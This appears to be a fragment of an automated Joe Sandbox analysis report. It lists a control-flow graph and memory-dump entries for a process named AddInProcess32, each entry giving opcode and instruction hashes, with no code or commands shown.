                    control_flow_graph 1734 583328-58334d 1735 58334f-583352 1734->1735 1736 583358-58336d 1735->1736 1737 583c12-583c15 1735->1737 1744 58336f-583375 1736->1744 1745 583385-58339b 1736->1745 1738 583c3b-583c3d 1737->1738 1739 583c17-583c36 1737->1739 1741 583c3f 1738->1741 1742 583c44-583c47 1738->1742 1739->1738 1741->1742 1742->1735 1743 583c4d-583c57 1742->1743 1747 583379-58337b 1744->1747 1748 583377 1744->1748 1751 5833a6-5833a8 1745->1751 1747->1745 1748->1745 1752 5833aa-5833b0 1751->1752 1753 5833c0-583431 1751->1753 1754 5833b2 1752->1754 1755 5833b4-5833b6 1752->1755 1764 58345d-583479 1753->1764 1765 583433-583456 1753->1765 1754->1753 1755->1753 1770 58347b-58349e 1764->1770 1771 5834a5-5834c0 1764->1771 1765->1764 1770->1771 1776 5834eb-583506 1771->1776 1777 5834c2-5834e4 1771->1777 1782 583508-583524 1776->1782 1783 58352b-583539 1776->1783 1777->1776 1782->1783 1784 583549-5835c3 1783->1784 1785 58353b-583544 1783->1785 1791 583610-583625 1784->1791 1792 5835c5-5835e3 1784->1792 1785->1743 1791->1737 1796 5835ff-58360e 1792->1796 1797 5835e5-5835f4 1792->1797 1796->1791 1796->1792 1797->1796
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad8b8f6d4e7c13dff8ff67931b0e09a9aae05c6f9b3f5592b01ca48c503ffb28
                    • Instruction ID: a8bfe9ac2791acf54cb0d9d44cb83432f8dd57a88d58597eaff2c8bdafbf65f7
                    • Opcode Fuzzy Hash: ad8b8f6d4e7c13dff8ff67931b0e09a9aae05c6f9b3f5592b01ca48c503ffb28
                    • Instruction Fuzzy Hash: 21912130B006158FDB54EF65C8957AE7BE6BFC4700F10856AE81AEB384EF70AD418B91
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 145ec9a675d5766f8d4fe09dc5ccaae85c4fc8c5aca5c5d3896dae952fa7ed05
                    • Instruction ID: aad6210c720f2076ea6a3c43f51963ae03155130ded3ee112e42a0357ab44845
                    • Opcode Fuzzy Hash: 145ec9a675d5766f8d4fe09dc5ccaae85c4fc8c5aca5c5d3896dae952fa7ed05
                    • Instruction Fuzzy Hash: 92511D30B006058FDB54EF75D895BAE7BE6ABC8710F10846AE816EB384EF70AD41CB51
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e71780808bb2ea5ab873eaebc76f1ab8fac8fa02122a1a2c6aac9f0c317ef3e7
                    • Instruction ID: 21e635adf7a6348788f0876c8185ffa3ef2e2a96d9ff4f4020197df275d9653b
                    • Opcode Fuzzy Hash: e71780808bb2ea5ab873eaebc76f1ab8fac8fa02122a1a2c6aac9f0c317ef3e7
                    • Instruction Fuzzy Hash: A3213B75E002149FDB50EF69D885BAEBBF5BB88310F108026E909E7380E735ED418B90
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ffacf632f8cdf5fc77ab3c9f5c18b4173a4ed8c99e426e968a48b31c36bcf11b
                    • Instruction ID: e4c12d5c75c71b4fbe52176d8b30fd32610a2479024184783e705340c619fdd4
                    • Opcode Fuzzy Hash: ffacf632f8cdf5fc77ab3c9f5c18b4173a4ed8c99e426e968a48b31c36bcf11b
                    • Instruction Fuzzy Hash: F721A435B001085FDF54EB69E4957AEBBA6FFC4310F148469E906EB381DB34ED468B84
                    Memory Dump Source
                    • Source File: 00000008.00000002.619174101.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_cd000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02928c39d3096f7b8d7b301a118e0a1c9a1f8b83298112a0e45eaf39d4f49572
                    • Instruction ID: c494f2fd6c5a78cb73494ae3d249411fe82b6f3b30c60a767e56668efbb6fd29
                    • Opcode Fuzzy Hash: 02928c39d3096f7b8d7b301a118e0a1c9a1f8b83298112a0e45eaf39d4f49572
                    • Instruction Fuzzy Hash: 6C21B075604240EFDB24CF18D8C4F1ABBA5EB84714F34C57EE84A4B246C33AD857DAA1
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87c4f0690af16cf9f3858f279b0c367d001f9272784093a1e7259273a4f98c08
                    • Instruction ID: f1a877cb7f470fdb117c2a65476ad21e5dcac0fbdc759781dbdbf541a86de08d
                    • Opcode Fuzzy Hash: 87c4f0690af16cf9f3858f279b0c367d001f9272784093a1e7259273a4f98c08
                    • Instruction Fuzzy Hash: 8621C234A00609CBDB14EFA4D5C5AADBBBAFF88305F248515ED02AB259C730ED82CF54
                    Memory Dump Source
                    • Source File: 00000008.00000002.619174101.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_cd000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c6983c3e8ff764818bfd0032f2b02d05a31266e8965668a884770cbd52a7dc5c
                    • Instruction ID: 91a515b2d3ea33610029e9e7059c0efe6739792f5549ea42abc3f550607a991d
                    • Opcode Fuzzy Hash: c6983c3e8ff764818bfd0032f2b02d05a31266e8965668a884770cbd52a7dc5c
                    • Instruction Fuzzy Hash: 67214F755083809FDB12CF14D994B15BFB1EB46314F28C5EBD8498F267C33A985ACB62
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 28200f363d64cb042cc8120c5888a8ce4ffef29483d6e6adb635df3684f26a1a
                    • Instruction ID: d6c8981783a3e3f1cbefb5cd928f801cf081704e230cdfe8ee7a0f66110bcc5f
                    • Opcode Fuzzy Hash: 28200f363d64cb042cc8120c5888a8ce4ffef29483d6e6adb635df3684f26a1a
                    • Instruction Fuzzy Hash: 2F117031B001184FDB44AA78DC586AF7AEAABC8310F10453AD806E7394DE65EC058791
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8a0ce64254f4e9a025e7ba9307adad2b575273c7e5ad8fcbfac9fc09fd6b2687
                    • Instruction ID: 4185246c5059247eb958464fd9872333784c2bde35eeed35b0526ebe069554cc
                    • Opcode Fuzzy Hash: 8a0ce64254f4e9a025e7ba9307adad2b575273c7e5ad8fcbfac9fc09fd6b2687
                    • Instruction Fuzzy Hash: 9D1148356002049BDF24AAA0E8916BA7FA5FB80310F104879DD06EB255D730DD058790
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e0f4990acaba5168a9bbb8c4264042550fca0115c6125c73336570c120ccb7af
                    • Instruction ID: 721540b3b89ac17c4b148ef4bca78acf2b7e0bee426002309a72c818ff632ae1
                    • Opcode Fuzzy Hash: e0f4990acaba5168a9bbb8c4264042550fca0115c6125c73336570c120ccb7af
                    • Instruction Fuzzy Hash: AF018832B001145FDB44AA69DC597EF77EAEBC8360F114436D906E7284EE64EC0647D1
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 784400c3d947805c256c703613c31c83e2f7b65707bfa23b933ed514b4e801d8
                    • Instruction ID: de7fd50006d32d11aedce4e538e1f77d40f380465e94d007e2adffa269321c58
                    • Opcode Fuzzy Hash: 784400c3d947805c256c703613c31c83e2f7b65707bfa23b933ed514b4e801d8
                    • Instruction Fuzzy Hash: 55F0A6767006111BCF207B39E8563AE2782EFC1322F00083AEC46CB302CE24DD078B80
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c4ae72c22bde50c1064eb76a316411a8d14866f10d06f669e7f860f73bd1fe
                    • Instruction ID: 1309b9b30afe74b3ca85364c83701c26999d3c1a35391d746f0e8fcb308d4b2e
                    • Opcode Fuzzy Hash: 14c4ae72c22bde50c1064eb76a316411a8d14866f10d06f669e7f860f73bd1fe
                    • Instruction Fuzzy Hash: A301A4317002155FDB20FB78E895B2E77E6EBC9710F108839E90EDB354EA25ED024B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: (#E$#E
                    • API String ID: 0-3101420961
                    • Opcode ID: edc620f33b3e59ab15e25b413ae53a124246018c7fc49dd0b16f8bbe5408e1fb
                    • Instruction ID: 7f88a9af976ce02c40c2ad4273db8280f1b164090ea72e288d8c35005ceb025e
                    • Opcode Fuzzy Hash: edc620f33b3e59ab15e25b413ae53a124246018c7fc49dd0b16f8bbe5408e1fb
                    • Instruction Fuzzy Hash: A5123130A00615CFDB24EF65C855BADBBB6BFC5300F20856AD909AB355DB71AD42CF84
                    Memory Dump Source
                    • Source File: 00000008.00000002.619271174.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_240000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7620dfd0fc9754538d008e4a926d93131c7f47235ed2346581f70f2384196074
                    • Instruction ID: c6435b9c1055050a66a4de7229263e366313d5d90ab926e0b9dcc4370d8de556
                    • Opcode Fuzzy Hash: 7620dfd0fc9754538d008e4a926d93131c7f47235ed2346581f70f2384196074
                    • Instruction Fuzzy Hash: 5CB14E71E10209CFDF18CFA9C88579DBBF2AF88704F148529E815E7294EB749A55CF81